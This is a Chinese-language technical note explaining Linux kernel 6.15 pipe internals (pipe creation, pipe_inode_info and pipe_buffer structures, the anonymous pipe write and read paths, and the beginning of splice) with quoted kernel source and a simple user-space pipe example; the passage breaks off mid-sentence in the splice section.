# Linux Kernel - analyze pipe > Author: 堇姬 Naup ## pipe 是一種 IPC 的方法 pipe 是用於不同 process 之間通訊的一個東西 可以通過 syscall pipe 來去使用 https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md ![image](https://hackmd.io/_uploads/Hyk7AGu_lx.png) ![image](https://hackmd.io/_uploads/SksQAGd_ge.png) 這兩者最終都會 call 到 `do_pipe2`,不過 pipe2 可以添加 flags ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1051 SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags) { return do_pipe2(fildes, flags); } SYSCALL_DEFINE1(pipe, int __user *, fildes) { return do_pipe2(fildes, 0); } ``` 他會去 call `__do_pipe_flags` 之後將從 `__do_pipe_flags` 分配的 files 跟 fd 綁定在一起,作為讀端和寫端 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1029 /* * sys_pipe() is the normal C calling standard for creating * a pipe. It's not the way Unix traditionally does this, though. */ static int do_pipe2(int __user *fildes, int flags) { struct file *files[2]; int fd[2]; int error; error = __do_pipe_flags(fd, files, flags); if (!error) { if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) { fput(files[0]); fput(files[1]); put_unused_fd(fd[0]); put_unused_fd(fd[1]); error = -EFAULT; } else { fd_install(fd[0], files[0]); fd_install(fd[1], files[1]); } } return error; } ``` 他會傳入兩個 file struct 並通過 `create_pipe_files` 來去創建 會建立 pipe 的內部結構(pipe_inode_info)、建立兩個 struct file 並設定它們的 f_op 並且用 `get_unused_fd_flags` 來去找尚未使用的 fd 並回傳 之後分別作為讀端與寫端的 fd `audit_fd_pair` 實際上會 call `__audit_fd_pair` 來將這一對 fd 記錄到 `audit_context` 中 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L976 static int __do_pipe_flags(int *fd, struct file **files, int flags) { int error; int fdw, fdr; if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE)) return -EINVAL; error = create_pipe_files(files, flags); if (error) return error; error = get_unused_fd_flags(flags); if (error < 0) goto err_read_pipe; fdr = error; error = get_unused_fd_flags(flags); if (error < 0) goto err_fdr; fdw = error; 
audit_fd_pair(fdr, fdw); fd[0] = fdr; fd[1] = fdw; /* pipe groks IOCB_NOWAIT */ files[0]->f_mode |= FMODE_NOWAIT; files[1]->f_mode |= FMODE_NOWAIT; return 0; err_fdr: put_unused_fd(fdr); err_read_pipe: fput(files[0]); fput(files[1]); return error; } ``` `create_pipe_files` 建立了很多東西 首先是 pipe inode 之後去建立 `struct pipe_inode_info` (作為 pipe metadata 描述整個 pipe 狀態) 並關聯 (主要是把 pipe_inode_info 的 pointer 以及 ops 給他,詳細可以看 code,這邊不太重要) 之後去 `alloc_file_pseudo` 建立了一個 write only 的 file 以及之後去 clone 一個 readonly 的 file 兩個都去指向 `inode` (這兩個就是上面說的作為讀端跟寫端的 fd) ```c int fd[2]; pipe(fd); // fd[0] = read end, fd[1] = write end ``` 也是 call pipe 會回傳的 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L925 int create_pipe_files(struct file **res, int flags) { struct inode *inode = get_pipe_inode(); struct file *f; int error; if (!inode) return -ENFILE; if (flags & O_NOTIFICATION_PIPE) { error = watch_queue_init(inode->i_pipe); if (error) { free_pipe_info(inode->i_pipe); iput(inode); return error; } } f = alloc_file_pseudo(inode, pipe_mnt, "", O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)), &pipeanon_fops); if (IS_ERR(f)) { free_pipe_info(inode->i_pipe); iput(inode); return PTR_ERR(f); } f->private_data = inode->i_pipe; f->f_pipe = 0; res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK), &pipeanon_fops); if (IS_ERR(res[0])) { put_pipe_info(inode, inode->i_pipe); fput(f); return PTR_ERR(res[0]); } res[0]->private_data = inode->i_pipe; res[0]->f_pipe = 0; res[1] = f; stream_open(inode, res[0]); stream_open(inode, res[1]); /* * Disable permission and pre-content events, but enable legacy * inotify events for legacy users. 
*/ file_set_fsnotify_mode(res[0], FMODE_NONOTIFY_PERM); file_set_fsnotify_mode(res[1], FMODE_NONOTIFY_PERM); return 0; } ``` `get_pipe_inode` 實現了分配 inode ([struct source](https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/fs.h#L672)) 並初始化 包括 `i_pipe` 指向 `pipe_inode_info` 或是給 fops 並給予 fuid fgid 等 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L885 static struct inode * get_pipe_inode(void) { struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb); struct pipe_inode_info *pipe; if (!inode) goto fail_inode; inode->i_ino = get_next_ino(); pipe = alloc_pipe_info(); if (!pipe) goto fail_iput; inode->i_pipe = pipe; pipe->files = 2; pipe->readers = pipe->writers = 1; inode->i_fop = &pipeanon_fops; /* * Mark the inode dirty from the very beginning, * that way it will never be moved to the dirty * list because "mark_inode_dirty()" will think * that it already _is_ on the dirty list. */ inode->i_state = I_DIRTY; inode->i_mode = S_IFIFO | S_IRUSR | S_IWUSR; inode->i_uid = current_fsuid(); inode->i_gid = current_fsgid(); simple_inode_init_ts(inode); return inode; fail_iput: iput(inode); fail_inode: return NULL; } ``` 最後來看看剛剛說的 `struct pipe_inode_info` 作為描述 pipe 的 metadata 有很多資訊存放在上面 - head: 下一個寫入位置 - tail: 下一個讀取位置 - rd_wait / wr_wait - 當 pipe 為空時,讀端進入 rd_wait 等待 - 當 pipe 為滿時,寫端進入 wr_wait 等待 - max_usage: ring buffer 可使用的最大 buffer 數 - readers / writers: 當前活躍的讀端與寫端數量 - files: 有多少個 struct file 引用這個 pipe(受 ->i_lock 保護) - r_counter / w_counter: 計數器,追蹤端點操作,主要用於判斷狀態變化與喚醒邏輯 - poll_usage: 表示此 pipe 是否用於 epoll(因為 epoll 會造成更頻繁的 wakeup,需要特殊處理) - tmp_page: 暫存釋放掉的 page - bufs: 指向真正的 ring buffer ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L86 /** * struct pipe_inode_info - a linux kernel pipe * @mutex: mutex protecting the whole thing * @rd_wait: reader wait point in case of empty pipe * @wr_wait: writer wait point in case of full pipe * @head: The point of buffer production * @tail: The point of buffer consumption * 
@head_tail: unsigned long union of @head and @tail * @note_loss: The next read() should insert a data-lost message * @max_usage: The maximum number of slots that may be used in the ring * @ring_size: total number of buffers (should be a power of 2) * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs * @tmp_page: cached released page * @readers: number of current readers of this pipe * @writers: number of current writers of this pipe * @files: number of struct file referring this pipe (protected by ->i_lock) * @r_counter: reader counter * @w_counter: writer counter * @poll_usage: is this pipe used for epoll, which has crazy wakeups? * @fasync_readers: reader side fasync * @fasync_writers: writer side fasync * @bufs: the circular array of pipe buffers * @user: the user who created this pipe * @watch_queue: If this pipe is a watch_queue, this is the stuff for that **/ struct pipe_inode_info { struct mutex mutex; wait_queue_head_t rd_wait, wr_wait; /* This has to match the 'union pipe_index' above */ union { unsigned long head_tail; struct { pipe_index_t head; pipe_index_t tail; }; }; unsigned int max_usage; unsigned int ring_size; unsigned int nr_accounted; unsigned int readers; unsigned int writers; unsigned int files; unsigned int r_counter; unsigned int w_counter; bool poll_usage; #ifdef CONFIG_WATCH_QUEUE bool note_loss; #endif struct page *tmp_page[2]; struct fasync_struct *fasync_readers; struct fasync_struct *fasync_writers; struct pipe_buffer *bufs; struct user_struct *user; #ifdef CONFIG_WATCH_QUEUE struct watch_queue *watch_queue; #endif }; ``` 分配 `pipe_inode_info` 的地方在 `alloc_pipe_info` 他會先分配一個 `pipe_inode_info` 之後去建立 0x10 `pipe_buffer` array 以及將 pipe 資訊都填入到 `pipe_inode_info` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L791 struct pipe_inode_info *alloc_pipe_info(void) { struct pipe_inode_info *pipe; unsigned long pipe_bufs = PIPE_DEF_BUFFERS; // #define PIPE_DEF_BUFFERS 16 struct user_struct *user = 
get_current_user(); unsigned long user_bufs; // static unsigned int pipe_max_size = 1048576; (0x100000) unsigned int max_size = READ_ONCE(pipe_max_size); \ pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT); if (pipe == NULL) goto out_free_uid; if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE)) pipe_bufs = max_size >> PAGE_SHIFT; user_bufs = account_pipe_buffers(user, 0, pipe_bufs); ... pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT); if (pipe->bufs) { init_waitqueue_head(&pipe->rd_wait); init_waitqueue_head(&pipe->wr_wait); pipe->r_counter = pipe->w_counter = 1; pipe->max_usage = pipe_bufs; pipe->ring_size = pipe_bufs; pipe->nr_accounted = pipe_bufs; pipe->user = user; mutex_init(&pipe->mutex); lock_set_cmp_fn(&pipe->mutex, pipe_lock_cmp_fn, NULL); return pipe; } ... return NULL; } ``` 接下來看一下 `pipe_buffer` pipe_buffer 就是用來存資料的地方,每個 pipe 管理了一些 page 來存想通過 pipe 傳輸的 data ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L17 /** * struct pipe_buffer - a linux kernel pipe buffer * @page: the page containing the data for the pipe buffer * @offset: offset of data inside the @page * @len: length of data inside the @page * @ops: operations associated with this buffer. See @pipe_buf_operations. * @flags: pipe buffer flags. See above. * @private: private data owned by the ops. 
**/ struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; unsigned long private; }; ``` 最終可以看全圖 ![pipe_all](https://hackmd.io/_uploads/rkGpO4OOle.png) 接下來可以看如何去操作 pipe 可以找到這張 vtable (就是放在 inode 的 `i_fop` 指向的 pipeanon_fops) PS: 一個是給命名管道 (`pipefifo_fops`),一個是給匿名管道 (`pipeanon_fops`) ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1243 const struct file_operations pipefifo_fops = { .open = fifo_open, .read_iter = fifo_pipe_read, .write_iter = fifo_pipe_write, .poll = pipe_poll, .unlocked_ioctl = pipe_ioctl, .release = pipe_release, .fasync = pipe_fasync, .splice_write = iter_file_splice_write, }; static const struct file_operations pipeanon_fops = { .open = fifo_open, .read_iter = anon_pipe_read, .write_iter = anon_pipe_write, .poll = pipe_poll, .unlocked_ioctl = pipe_ioctl, .release = pipe_release, .fasync = pipe_fasync, .splice_write = iter_file_splice_write, }; ``` 可以去對 pipe 做 read write 等操作 這部分因為我是看 6.15 版本的 kernel 他將 pipe ops function 變成這樣 (這部分應該是針對匿名管道效率做出的優化) https://git.sceen.net/linux/linux-stable.git/commit/?id=71ee2fde57c707ac8f221321f3e951288f00f04b - anon_pipe_write: 將 data 寫入到 pipe_buffer 上 - anon_pipe_read: 將 data 從 pipe_buffer 讀出來 - splice: 在兩個檔案描述符之間搬資料時,盡量做到零拷貝 ## anon_pipe_write 當我們對 pipe fd 做寫入 (就是要寫進 pipe_buffer),在匿名管道會 call 到這個 `anon_pipe_write` 當我們去 call `write` 的時候 會去 call ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L744 SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf, size_t, count) { return ksys_write(fd, buf, count); } ``` 之後去 call 到 `ksys_write` 如果 f.file 存在,透過 file_ppos 找到在檔案中的位置,其位置位於 f_pos 欄位,回傳到指標 *ppos ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L725 ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count) { CLASS(fd_pos, f)(fd); // 應該是 fd 轉 struct file ssize_t ret = -EBADF; if (!fd_empty(f)) { loff_t pos, *ppos = file_ppos(fd_file(f)); // 當前的讀寫位置 if (ppos) { pos = *ppos; ppos = &pos; } ret = 
vfs_write(fd_file(f), buf, count, ppos); if (ret >= 0 && ppos) fd_file(f)->f_pos = pos; } return ret; } #define CLASS(_name, var) \ class_##_name##_t var __cleanup(class_##_name##_destructor) = \ class_##_name##_constructor #define fd_file(f) ((struct file *)((f).word & ~(FDPUT_FPUT|FDPUT_POS_UNLOCK))) static inline bool fd_empty(struct fd f) { return unlikely(!f.word); } /* file_ppos returns &file->f_pos or NULL if file is stream */ static inline loff_t *file_ppos(struct file *file) { return file->f_mode & FMODE_STREAM ? NULL : &file->f_pos; } ``` 之後去 call `vfs_write` VFS 定義了在實體檔案系統上更高一層的介面,讓應用程式得以透過VFS 定義好的介面存取底層資料,不用考慮底層是如何實作 https://students.mimuw.edu.pl/ZSO/Wyklady/08_VFS1/VFS-1.pdf * file: 指向欲寫入的檔案結構 (struct file) * buf: 指向使用者空間的資料緩衝區 * count: 欲寫入的資料長度(bytes) * pos: 指向檔案寫入位置的指標(offset) vfs_write 是 Linux VFS 層統一的寫入介面,包含: * 權限和參數合法性檢查 (檔案) * 位置與大小驗證 * 呼叫檔案系統特定的寫入函式 * 寫入後通知檔案系統事件 * 鎖定及統計管理 是連接 syscall write() 與底層檔案系統實際寫入的函式 這部分其他先不管,他會根據你傳入的 file 的 vtable 去找 write,最後就會 call 到目標 `vfs_write` → `new_sync_write` → `filp->f_op->write_iter(&kiocb, &iter)` → `anon_pipe_write()` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L664 ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos) { ssize_t ret; if (!(file->f_mode & FMODE_WRITE)) return -EBADF; if (!(file->f_mode & FMODE_CAN_WRITE)) return -EINVAL; if (unlikely(!access_ok(buf, count))) return -EFAULT; ret = rw_verify_area(WRITE, file, pos, count); if (ret) return ret; if (count > MAX_RW_COUNT) count = MAX_RW_COUNT; file_start_write(file); if (file->f_op->write) ret = file->f_op->write(file, buf, count, pos); else if (file->f_op->write_iter) ret = new_sync_write(file, buf, count, pos); else ret = -EINVAL; if (ret > 0) { fsnotify_modify(file); add_wchar(current, ret); } inc_syscw(current); file_end_write(file); return ret; } ``` 這部分是在串接 kiocb、iter 等 這邊簡單理解 kiocb 內含檔案、寫入位置、狀態等各種 Linux I/O 相關 iov_iter 告訴 kernel 從哪裡拿資料 ```c static ssize_t new_sync_write(struct file 
*filp, const char __user *buf, size_t len, loff_t *ppos) { struct kiocb kiocb; struct iov_iter iter; ssize_t ret; init_sync_kiocb(&kiocb, filp); kiocb.ki_pos = (ppos ? *ppos : 0); iov_iter_ubuf(&iter, ITER_SOURCE, (void __user *)buf, len); ret = filp->f_op->write_iter(&kiocb, &iter); BUG_ON(ret == -EIOCBQUEUED); if (ret > 0 && ppos) *ppos = kiocb.ki_pos; return ret; } ``` 接下來進入重點,匿名 pipe 的寫入行為 首先是一些初始化 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L431 static ssize_t anon_pipe_write(struct kiocb *iocb, struct iov_iter *from) { struct file *filp = iocb->ki_filp; struct pipe_inode_info *pipe = filp->private_data; unsigned int head; ssize_t ret = 0; size_t total_len = iov_iter_count(from); ssize_t chars; bool was_empty = false; bool wake_next_writer = false; ``` 這部分在試圖去合併到當前存在的尾部 若當前的 pipe 不是 empty 且小於一個 page 之後檢查是否合併後會大於一個 page 跟那個 pipe_buffer (當前 head - 1) 是否有開啟 `PIPE_BUF_FLAG_CAN_MERGE` 更新 offset 到沒使用到的地方 之後去將東西 copy 到對應 page 上 ```c head = pipe->head; was_empty = pipe_empty(head, pipe->tail); chars = total_len & (PAGE_SIZE-1); if (chars && !was_empty) { struct pipe_buffer *buf = pipe_buf(pipe, head - 1); int offset = buf->offset + buf->len; if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && offset + chars <= PAGE_SIZE) { ret = pipe_buf_confirm(pipe, buf); if (ret) goto out; ret = copy_page_from_iter(buf->page, offset, chars, from); if (unlikely(ret < chars)) { ret = -EFAULT; goto out; } buf->len += ret; if (!iov_iter_count(from)) goto out; } } ``` 這是個主迴圈 首先會先檢查 pipe 一些資訊,以及當前 pipe 有沒有 full 狀態 若可以寫入,就去拿一塊 page 來用 `anon_pipe_get_page` 封裝了有關 alloc page 跟拿 tmp 的邏輯 不過總之你會拿到一塊 page 用來作為 pipe_buffer 存放資料的地方 之後用 copy_page_from_iter() 去 copy copy 完後 前移 head,並將去設置好 pipe_buffer 內容 (包含剛剛寫入的 page) 並設置該 buffer 的 offset 為 0(從 0 開始 copy) buffer len 設置成 copy 的長度 之後去根據 packetized 設置情況,來去設置 flags 代表該 page 後續是否可以被合併 ```c for (;;) { if (!pipe->readers) { send_sig(SIGPIPE, current, 0); if (!ret) ret = -EPIPE; break; } head = pipe->head; if (!pipe_full(head, pipe->tail, 
pipe->max_usage)) { struct pipe_buffer *buf; struct page *page; int copied; page = anon_pipe_get_page(pipe); if (unlikely(!page)) { if (!ret) ret = -ENOMEM; break; } copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) { anon_pipe_put_page(pipe, page); if (!ret) ret = -EFAULT; break; } pipe->head = head + 1; /* Insert it into the buffer array */ buf = pipe_buf(pipe, head); buf->page = page; buf->ops = &anon_pipe_buf_ops; buf->offset = 0; if (is_packetized(filp)) buf->flags = PIPE_BUF_FLAG_PACKET; else buf->flags = PIPE_BUF_FLAG_CAN_MERGE; buf->len = copied; ret += copied; if (!iov_iter_count(from)) break; continue; } /* Wait for buffer space to become available. */ if ((filp->f_flags & O_NONBLOCK) || (iocb->ki_flags & IOCB_NOWAIT)) { if (!ret) ret = -EAGAIN; break; } if (signal_pending(current)) { if (!ret) ret = -ERESTARTSYS; break; } /* * We're going to release the pipe lock and wait for more * space. We wake up any readers if necessary, and then * after waiting we need to re-check whether the pipe * become empty while we dropped the lock. 
*/ mutex_unlock(&pipe->mutex); if (was_empty) wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe)); mutex_lock(&pipe->mutex); was_empty = pipe_is_empty(pipe); wake_next_writer = true; } ``` 整體寫入邏輯大概是這樣 這邊想細講一下 `copy_page_from_iter` 他會傳入想 copy 的 page pointer 跟起始 offset,跟想寫進去多少 bytes 以及 iter - page_copy_sane 用來檢查傳入的 offset、bytes 是否合法合理 - 之後去 `kmap_local_page` 來將 page 映射到 kernel virtual address 來去操作他並計算本次從該頁可複製的最大位元組數 - 之後 copy 後去 `kunmap_local` 取消映射 ```c size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { size_t res = 0; if (!page_copy_sane(page, offset, bytes)) return 0; page += offset / PAGE_SIZE; // first subpage offset %= PAGE_SIZE; while (1) { void *kaddr = kmap_local_page(page); size_t n = min(bytes, (size_t)PAGE_SIZE - offset); n = _copy_from_iter(kaddr + offset, n, i); kunmap_local(kaddr); res += n; bytes -= n; if (!bytes || !n) break; offset += n; if (offset == PAGE_SIZE) { page++; offset = 0; } } return res; } EXPORT_SYMBOL(copy_page_from_iter); ``` 在 user space 使用 pipe 大概就像這樣 通過 `pipe` 建立 pipe 之後去創建一個子進程 子進程因為 read 阻塞 (pipe 內沒有資料),會等到父進程寫入資料到 pipe 之後才讀取 ```c #include <stdio.h> #include <unistd.h> #include <string.h> #include <stdlib.h> #include <sys/wait.h> int main() { int pipefd[2]; pid_t cpid; char buf[100]; if (pipe(pipefd) == -1) { perror("pipe"); exit(EXIT_FAILURE); } cpid = fork(); if (cpid == -1) { perror("fork"); exit(EXIT_FAILURE); } if (cpid == 0) { close(pipefd[1]); ssize_t n = read(pipefd[0], buf, sizeof(buf) - 1); if (n > 0) { buf[n] = '\0'; printf("Child read from pipe: %s\n", buf); } close(pipefd[0]); exit(EXIT_SUCCESS); } else { close(pipefd[0]); const char *msg = "Hello, pipe!"; write(pipefd[1], msg, strlen(msg)); close(pipefd[1]); wait(NULL); exit(EXIT_SUCCESS); } } ``` ## anon_pipe_read 前面的部分跟 write 很像 通過 syscall 調用到 `ksys_read` ```c // 
https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L720 SYSCALL_DEFINE3(read, unsigned int, fd, char __user *, buf, size_t, count) { return ksys_read(fd, buf, count); } ``` 一樣的流程處理 fd 跟 buf 之後 call `vfs_read` ```c ssize_t ksys_read(unsigned int fd, char __user *buf, size_t count) { CLASS(fd_pos, f)(fd); ssize_t ret = -EBADF; if (!fd_empty(f)) { loff_t pos, *ppos = file_ppos(fd_file(f)); if (ppos) { pos = *ppos; ppos = &pos; } ret = vfs_read(fd_file(f), buf, count, ppos); if (ret >= 0 && ppos) fd_file(f)->f_pos = pos; } return ret; } ``` 一樣去做了相當多檢查 並且去 call `new_sync_read` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L550 ssize_t vfs_read(struct file *file, char __user *buf, size_t count, loff_t *pos) { ssize_t ret; if (!(file->f_mode & FMODE_READ)) return -EBADF; if (!(file->f_mode & FMODE_CAN_READ)) return -EINVAL; if (unlikely(!access_ok(buf, count))) return -EFAULT; ret = rw_verify_area(READ, file, pos, count); if (ret) return ret; if (count > MAX_RW_COUNT) count = MAX_RW_COUNT; if (file->f_op->read) ret = file->f_op->read(file, buf, count, pos); else if (file->f_op->read_iter) ret = new_sync_read(file, buf, count, pos); else ret = -EINVAL; if (ret > 0) { fsnotify_access(file); add_rchar(current, ret); } inc_syscr(current); return ret; } ``` 將 kiocb 跟 iter 初始化後 去 call `filp->f_op->read_iter` 根據 vtable 實際上調用到 `anon_pipe_read` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L479 static ssize_t new_sync_read(struct file *filp, char __user *buf, size_t len, loff_t *ppos) { struct kiocb kiocb; struct iov_iter iter; ssize_t ret; init_sync_kiocb(&kiocb, filp); kiocb.ki_pos = (ppos ? 
*ppos : 0); iov_iter_ubuf(&iter, ITER_DEST, buf, len); ret = filp->f_op->read_iter(&kiocb, &iter); BUG_ON(ret == -EIOCBQUEUED); if (ppos) *ppos = kiocb.ki_pos; return ret; } ``` 一開始初始化了一些變數 * iocb:裡面有目前文件指標(filp) * to:讀資料要寫入的 iov_iter * total_len:本次預計要讀的字節數 * pipe:匿名管道的資料結構 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L270 static ssize_t anon_pipe_read(struct kiocb *iocb, struct iov_iter *to) { size_t total_len = iov_iter_count(to); struct file *filp = iocb->ki_filp; struct pipe_inode_info *pipe = filp->private_data; bool wake_writer = false, wake_next_reader = false; ssize_t ret; /* Null read succeeds. */ if (unlikely(total_len == 0)) return 0; ret = 0; mutex_lock(&pipe->mutex); ``` 之後是主迴圈 - smp_load_acquire 讀取 head,以及讀取 tail (head: 下一個寫入 pipe_buffer 位置、tail: 下一個讀取 pipe_buffer 位置) - CONFIG_WATCH_QUEUE 分支我們先不管 - 檢查 pipe 不等於 empty - 從 tail 讀入要讀取的 page - 之後去 `copy_page_to_iter` copy 到 iter (buf) (若複製少於預期,返回錯誤) - 將 offset 下推更新已經讀取範圍,以及 len 去扣掉 chars - 最後去更新 tail ```c /* * We only wake up writers if the pipe was full when we started reading * and it is no longer full after reading to avoid unnecessary wakeups. * * But when we do wake up writers, we do so using a sync wakeup * (WF_SYNC), because we want them to get going and generate more * data for us. 
*/ for (;;) { /* Read ->head with a barrier vs post_one_notification() */ unsigned int head = smp_load_acquire(&pipe->head); unsigned int tail = pipe->tail; #ifdef CONFIG_WATCH_QUEUE if (pipe->note_loss) { struct watch_notification n; if (total_len < 8) { if (ret == 0) ret = -ENOBUFS; break; } n.type = WATCH_TYPE_META; n.subtype = WATCH_META_LOSS_NOTIFICATION; n.info = watch_sizeof(n); if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) { if (ret == 0) ret = -EFAULT; break; } ret += sizeof(n); total_len -= sizeof(n); pipe->note_loss = false; } #endif if (!pipe_empty(head, tail)) { struct pipe_buffer *buf = pipe_buf(pipe, tail); size_t chars = buf->len; size_t written; int error; if (chars > total_len) { if (buf->flags & PIPE_BUF_FLAG_WHOLE) { if (ret == 0) ret = -ENOBUFS; break; } chars = total_len; } error = pipe_buf_confirm(pipe, buf); if (error) { if (!ret) ret = error; break; } written = copy_page_to_iter(buf->page, buf->offset, chars, to); if (unlikely(written < chars)) { if (!ret) ret = -EFAULT; break; } ret += chars; buf->offset += chars; buf->len -= chars; /* Was it a packet buffer? Clean up and exit */ if (buf->flags & PIPE_BUF_FLAG_PACKET) { total_len = chars; buf->len = 0; } if (!buf->len) { wake_writer |= pipe_full(head, tail, pipe->max_usage); tail = pipe_update_tail(pipe, buf, tail); } total_len -= chars; if (!total_len) break; /* common path: read succeeded */ if (!pipe_empty(head, tail)) /* More to do? */ continue; } if (!pipe->writers) break; if (ret) break; if ((filp->f_flags & O_NONBLOCK) || (iocb->ki_flags & IOCB_NOWAIT)) { ret = -EAGAIN; break; } mutex_unlock(&pipe->mutex); /* * We only get here if we didn't actually read anything. * * But because we didn't read anything, at this point we can * just return directly with -ERESTARTSYS if we're interrupted, * since we've done any required wakeups and there's no need * to mark anything accessed. And we've dropped the lock. 
*/ if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0) return -ERESTARTSYS; wake_next_reader = true; mutex_lock(&pipe->mutex); } ``` 更新 tail 邏輯如下 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L239 static inline unsigned int pipe_update_tail(struct pipe_inode_info *pipe, struct pipe_buffer *buf, unsigned int tail) { pipe_buf_release(pipe, buf); /* * If the pipe has a watch_queue, we need additional protection * by the spinlock because notifications get posted with only * this spinlock, no mutex */ if (pipe_has_watch_queue(pipe)) { spin_lock_irq(&pipe->rd_wait.lock); #ifdef CONFIG_WATCH_QUEUE if (buf->flags & PIPE_BUF_FLAG_LOSS) pipe->note_loss = true; #endif pipe->tail = ++tail; spin_unlock_irq(&pipe->rd_wait.lock); return tail; } /* * Without a watch_queue, we can simply increment the tail * without the spinlock - the mutex is enough. */ pipe->tail = ++tail; return tail; } ``` 以上就是從 pipe read 資料到 buffer 的呼叫流程 ## release ## splice 先來看看文檔怎麼用 https://man7.org/linux/man-pages/man2/splice.2.html ```c ssize_t splice(int fd_in, off_t *_Nullable off_in, int fd_out, off_t *_Nullable off_out, size_t size, unsigned int flags); ``` * fd_in:輸入的檔案描述符 * off_in:輸入檔案偏移量指標(可能是 NULL) * fd_out:輸出的檔案描述符 * off_out:輸出檔案偏移量指標(可能是 NULL) * size:要搬運的位元組數 * flags:SPLICE_F_* 選項 splice() 用來在兩個 file descriptor 之間移動資料,不需要在 kernel space 與 user space 之間複製資料,因此效率比 read() + write() 高 它最多會傳輸 size 個位元組,其中至少有一個 fd 必須是 pipe fd_in 與 off_in 規則 * 如果 fd_in 是 pipe → off_in 必須是 NULL * 如果 fd_in 不是 pipe 且 off_in == NULL → 從當前檔案偏移量讀取,並自動更新該檔案偏移量 * 如果 fd_in 不是 pipe 且 off_in != NULL → 從 \*off_in 指定的偏移量讀取,不會影響檔案本身的偏移量,但會更新 \*off_in fd_out / off_out 規則與 fd_in / off_in 的規則類似 flags 直接去看文檔 額外參考: https://www.kernel.org/doc/html/v6.15/filesystems/splice.html 根據上述,共會有三種狀況 - pipe2pipe - pipe2file - file2pipe 以下是 kernel source code 當呼叫 splice 會去調用到 syscall 做了些 flags len 檢查,然後用 `CLASS` macro 找到 fd 的 file pointer 後 就去 call `__do_splice` ```c // 
https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1615 SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in, int, fd_out, loff_t __user *, off_out, size_t, len, unsigned int, flags) { if (unlikely(!len)) return 0; if (unlikely(flags & ~SPLICE_F_ALL)) return -EINVAL; CLASS(fd, in)(fd_in); if (fd_empty(in)) return -EBADF; CLASS(fd, out)(fd_out); if (fd_empty(out)) return -EBADF; return __do_splice(fd_file(in), off_in, fd_file(out), off_out, len, flags); } ``` 首先初始化以下變數 * ipipe / opipe:指向輸入(in)/輸出(out)的 pipe kernel 結構,如果該 fd 不是 pipe,會是 NULL * offset:臨時存放 offset * \__off_in / \__off_out:指向 kernel 中的 offset 變數,如果使用者傳了 offset 參數,就用它們 之後通過 `get_pipe_info` 去讀取看看該 fd 是不是 pipe 若該 fd 是 pipe,則對應的 offset 必須是 NULL (否則回傳 `-ESPIPE`) 之後從 userspace copy offset 最後 call `do_splice` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1396 static ssize_t __do_splice(struct file *in, loff_t __user *off_in, struct file *out, loff_t __user *off_out, size_t len, unsigned int flags) { struct pipe_inode_info *ipipe; struct pipe_inode_info *opipe; loff_t offset, *__off_in = NULL, *__off_out = NULL; ssize_t ret; ipipe = get_pipe_info(in, true); opipe = get_pipe_info(out, true); if (ipipe) { if (off_in) return -ESPIPE; pipe_clear_nowait(in); } if (opipe) { if (off_out) return -ESPIPE; pipe_clear_nowait(out); } if (off_out) { if (copy_from_user(&offset, off_out, sizeof(loff_t))) return -EFAULT; __off_out = &offset; } if (off_in) { if (copy_from_user(&offset, off_in, sizeof(loff_t))) return -EFAULT; __off_in = &offset; } ret = do_splice(in, __off_in, out, __off_out, len, flags); if (ret < 0) return ret; if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t))) return -EFAULT; if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t))) return -EFAULT; return ret; } ``` 首先先檢查 in 是不是可讀,out 是不是可寫 之後去 call get_pipe_info 拿到對應的 